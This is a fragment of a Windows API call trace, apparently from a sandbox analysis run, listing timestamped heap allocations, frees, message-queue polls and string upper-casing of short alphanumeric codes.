HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0215.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0215.064] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11490) returned 0x2a8a138 [0215.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0215.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11490) returned 0x2abfd10 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0215.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0215.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0215.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0215.068] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0215.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0215.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0215.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0215.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0215.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0215.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0215.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0215.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0215.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0215.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0215.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.074] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.074] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0215.074] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0215.075] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.075] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0215.075] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0215.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab950 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0215.075] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0215.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0215.075] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0215.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0215.076] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0215.076] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.079] 